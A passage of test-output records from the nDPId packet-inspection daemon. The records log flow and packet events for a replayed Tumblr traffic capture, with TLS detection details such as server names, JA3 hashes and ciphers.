+00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} +00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} 
+00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} 
+00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwVJeVyjqfgBBI2yKLAAABAQgKqXtZHsLc+ww="} 
+00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3N5hBwa5pgBAB9TOKAAABAQgKqXtZHsLc+w0="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
